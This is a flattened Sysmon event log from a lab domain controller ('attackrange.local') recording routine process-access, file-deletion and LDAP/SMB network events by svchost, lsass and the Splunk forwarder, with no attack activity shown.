12:07:12.621{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010257Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:12.621{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010256Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:07:12.621{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010255Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:12.621{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x800000000000000010276Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:13.824{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2F73CE7679518FC7A62502232EB32DA6,SHA256=6C1E68034CBE6E50EF0978D8A6FC94AE20A96CC19693CCE8D7D4319A66BDD820,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010275Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:13.824{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AD1B69D2A7563846DA5258F220E87FF2,SHA256=5C93703A25BAC76EBD45731A98181C3B5E55A5B6B87792B860B0870ABE146A93,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010283Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:14.043{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=73D49C7ED7359A216D50E87A709F6A07,SHA256=5CEDAE3347EB370282DDBD18C6C6808BA331E9AC2351C4B8CB9EDF866019AD9D,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000010282Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:13.262{266CAFBE-6467-6064-0100-00000000AE01}4SystemNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local53682-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local445microsoft-ds 354300x800000000000000010281Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:13.262{266CAFBE-6467-6064-0100-00000000AE01}4SystemNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local53682-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local445microsoft-ds 
354300x800000000000000010280Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:13.160{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-892.attackrange.local53681-false10.0.1.14win-dc-892.attackrange.local389ldap 354300x800000000000000010279Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:13.160{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53681-false10.0.1.14win-dc-892.attackrange.local389ldap 354300x800000000000000010278Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:13.152{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local53680-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local389ldap 354300x800000000000000010277Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:13.152{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local53680-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local389ldap 23542300x800000000000000010285Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:15.167{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2F73CE7679518FC7A62502232EB32DA6,SHA256=6C1E68034CBE6E50EF0978D8A6FC94AE20A96CC19693CCE8D7D4319A66BDD820,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010284Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:15.089{266CAFBE-64FC-6064-1001-00000000AE01}6660NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C0DD1166FE468EE58C9CB78FF0F745D9,SHA256=ED6ADBF42CC90F5E6746A3B7128D2486608C5D2B1D576E8224782662FBAC5079,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000010289Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:15.508{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53684-false10.0.1.12-8000- 23542300x800000000000000010288Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:16.152{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8E9CD8DD88C59AB25C0852E1611CA9A3,SHA256=1297718CBD76A0536F8EBBA1A2A0FEFFE42BC46B1C574DD5A850BD24D2B38427,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000010287Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:14.524{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53683-true0:0:0:0:0:0:0:1win-dc-892.attackrange.local389ldap 354300x800000000000000010286Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:14.524{266CAFBE-647D-6064-3000-00000000AE01}2648C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53683-true0:0:0:0:0:0:0:1win-dc-892.attackrange.local389ldap 
23542300x800000000000000010290Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:17.245{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=22D9AD1FA23E7E04D9EF3100A0154D3A,SHA256=1DB1894496A90595FF463770A8514324F4943BECCFD35CEED1CFC443119ED276,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010319Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:18.448{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\ProgramData\Microsoft\Windows\AppRepository\28A6.tmpMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010318Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:18.448{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\ProgramData\Microsoft\Windows\AppRepository\d4ec2279-a0c2-4422-82e8-34cc65d9a664_S-1-5-21-4055678433-3894535204-3898404691-500_14.rslcMD5=8F550E873FBDC1B03BF74C696D92CDB9,SHA256=A23E1C824110FAE64400BB8F553B478ECB19295E4B09708A612E05048DC12696,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010317Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:18.448{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\ProgramData\Microsoft\Windows\AppRepository\28A5.tmpMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010316Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:07:18.448{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\ProgramData\Microsoft\Windows\AppRepository\d4ec2279-a0c2-4422-82e8-34cc65d9a664_S-1-5-21-4055678433-3894535204-3898404691-500_12.rslcMD5=E81C6E8D4B738BC8724E05F4065353CE,SHA256=349F526B5C422BE4E0B3CD07F7BDF03935B0FDC8C02064C6843A32B3BCFABBF6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010315Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:18.432{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\ProgramData\Microsoft\Windows\AppRepository\2894.tmpMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010314Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:18.432{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\ProgramData\Microsoft\Windows\AppRepository\d4ec2279-a0c2-4422-82e8-34cc65d9a664_S-1-5-21-4055678433-3894535204-3898404691-500_13.rslcMD5=C083A118F5365BF1604AB51272849432,SHA256=78D85BA7F94AC696CA1A27237AF7D9F1E826A8D48756E97A393630FE1C7A540A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010313Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:18.432{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\ProgramData\Microsoft\Windows\AppRepository\2893.tmpMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010312Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:18.432{266CAFBE-64C6-6064-A900-00000000AE01}3404NT 
AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\ProgramData\Microsoft\Windows\AppRepository\d4ec2279-a0c2-4422-82e8-34cc65d9a664_S-1-5-21-4055678433-3894535204-3898404691-500_10.rslcMD5=EFFC38495D7BB371926D3100A728810F,SHA256=7B935BCCFB869295A1C343BAFFF9D7A18464E922EFE89A4B658443370050A852,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010311Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:18.432{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\ProgramData\Microsoft\Windows\AppRepository\2892.tmpMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010310Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:18.432{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\ProgramData\Microsoft\Windows\AppRepository\d4ec2279-a0c2-4422-82e8-34cc65d9a664_S-1-5-21-4055678433-3894535204-3898404691-500_11.rslcMD5=1F9D1399A60C309143DA8DBA5FCA78B7,SHA256=241205C9A2E659306DF7DE260C0C6630DA6EEB80014F3C5BBF527F3EF249D2C1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010309Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:18.432{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\ProgramData\Microsoft\Windows\AppRepository\2891.tmpMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010308Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:18.432{266CAFBE-64C6-6064-A900-00000000AE01}3404NT 
AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\ProgramData\Microsoft\Windows\AppRepository\d4ec2279-a0c2-4422-82e8-34cc65d9a664_S-1-5-21-4055678433-3894535204-3898404691-500_9.rslcMD5=14B4ADE4BB1D0C5143CA4A4708E77197,SHA256=EA588F603FF7D17EA1BEDEA528A3A0252A261DC62666F9DB848488B99BAF5189,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010307Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:18.417{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\ProgramData\Microsoft\Windows\AppRepository\2881.tmpMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010306Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:18.417{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\ProgramData\Microsoft\Windows\AppRepository\d4ec2279-a0c2-4422-82e8-34cc65d9a664_S-1-5-21-4055678433-3894535204-3898404691-500_6.rslcMD5=85692122DD1334A73E55EFFACCF5E3DF,SHA256=A5CC11617FD6644D87E73D8BC6015A62A4163FB8A28E4AC1FE5824EFDB4535DB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010305Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:18.417{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\ProgramData\Microsoft\Windows\AppRepository\2880.tmpMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010304Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:18.417{266CAFBE-64C6-6064-A900-00000000AE01}3404NT 
AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\ProgramData\Microsoft\Windows\AppRepository\d4ec2279-a0c2-4422-82e8-34cc65d9a664_S-1-5-21-4055678433-3894535204-3898404691-500_8.rslcMD5=B78B77A1B75A721643C0FD83C10C542A,SHA256=2FEB23DB338783C72A67125CB113AA817078BCE7C669AFF72D83EBF72B1BFD19,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010303Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:18.417{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\ProgramData\Microsoft\Windows\AppRepository\287F.tmpMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010302Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:18.417{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\ProgramData\Microsoft\Windows\AppRepository\d4ec2279-a0c2-4422-82e8-34cc65d9a664_S-1-5-21-4055678433-3894535204-3898404691-500_7.rslcMD5=471CD78DADC5E71F87AE1F2D5F22CF4A,SHA256=FA939CBB340434F83096D7E83ED759187070235ED922BED09FD45215FEBF705D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010301Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:18.417{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\ProgramData\Microsoft\Windows\AppRepository\287E.tmpMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010300Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:18.417{266CAFBE-64C6-6064-A900-00000000AE01}3404NT 
AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\ProgramData\Microsoft\Windows\AppRepository\d4ec2279-a0c2-4422-82e8-34cc65d9a664_S-1-5-21-4055678433-3894535204-3898404691-500_5.rslcMD5=79F5AEC887844E88BC3F3B0418C3DCBC,SHA256=7305F078EF415935753DB343C0F91C1FDBDCE5B66E3179B89AFB5785C8243056,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010299Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:18.401{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\ProgramData\Microsoft\Windows\AppRepository\286D.tmpMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010298Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:18.401{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\ProgramData\Microsoft\Windows\AppRepository\d4ec2279-a0c2-4422-82e8-34cc65d9a664_S-1-5-21-4055678433-3894535204-3898404691-500_4.rslcMD5=9FE2C1D66F9BC7125314AE1A941451F5,SHA256=C06ADF1F7DE4439C1C5CD8FFDCD414FFE30E87EDF4A2795D2BA3C84B04CDAA08,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010297Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:18.401{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\ProgramData\Microsoft\Windows\AppRepository\286C.tmpMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010296Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:18.401{266CAFBE-64C6-6064-A900-00000000AE01}3404NT 
AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\ProgramData\Microsoft\Windows\AppRepository\d4ec2279-a0c2-4422-82e8-34cc65d9a664_S-1-5-21-4055678433-3894535204-3898404691-500_3.rslcMD5=E8625F0AE477D2338F90CCD3DE095138,SHA256=9481376CEB762C07B7D87DDDD88EBF22467908E2F157386F8C8ED0CB28C3B4EE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010295Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:18.401{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\ProgramData\Microsoft\Windows\AppRepository\286B.tmpMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010294Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:18.401{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\ProgramData\Microsoft\Windows\AppRepository\d4ec2279-a0c2-4422-82e8-34cc65d9a664_S-1-5-21-4055678433-3894535204-3898404691-500_2.rslcMD5=24DE2425A7FBFE83CAE353BF3DF8A32A,SHA256=E2E35CA12A42879A1585AF05720CAD8E6182E14BE7E1B5A05FEE1D4B86BDEAF0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010293Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:18.401{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\ProgramData\Microsoft\Windows\AppRepository\286A.tmpMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010292Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:18.401{266CAFBE-64C6-6064-A900-00000000AE01}3404NT 
AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\ProgramData\Microsoft\Windows\AppRepository\d4ec2279-a0c2-4422-82e8-34cc65d9a664_S-1-5-21-4055678433-3894535204-3898404691-500_1.rslcMD5=C9D8E740E1A8CF089BE3FD49431F9D25,SHA256=C74D0E126D0F0B0AC540F606996CC707301586A6BCD1F8E30BAC541FF7D015D8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010291Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:18.338{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=781A977F985F54EAA536F22CE1C339E3,SHA256=44E47443CD3D60BFFB45043329539F7A0DB67388C961111C363EC948B8C6410D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010322Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:19.510{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=7DE3728E21641F89EAFB923C98EB3539,SHA256=805A7A961033418664F340EC510915F35C4B9F59DBB34056E803E62D8758C5FF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010321Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:19.510{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=C7473592ABE08110688B66C5673E6FE5,SHA256=7693F93F526BBA7A83C694299B80E718F80C9D594B6E7F2F9E333ACC1262F1CA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010320Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
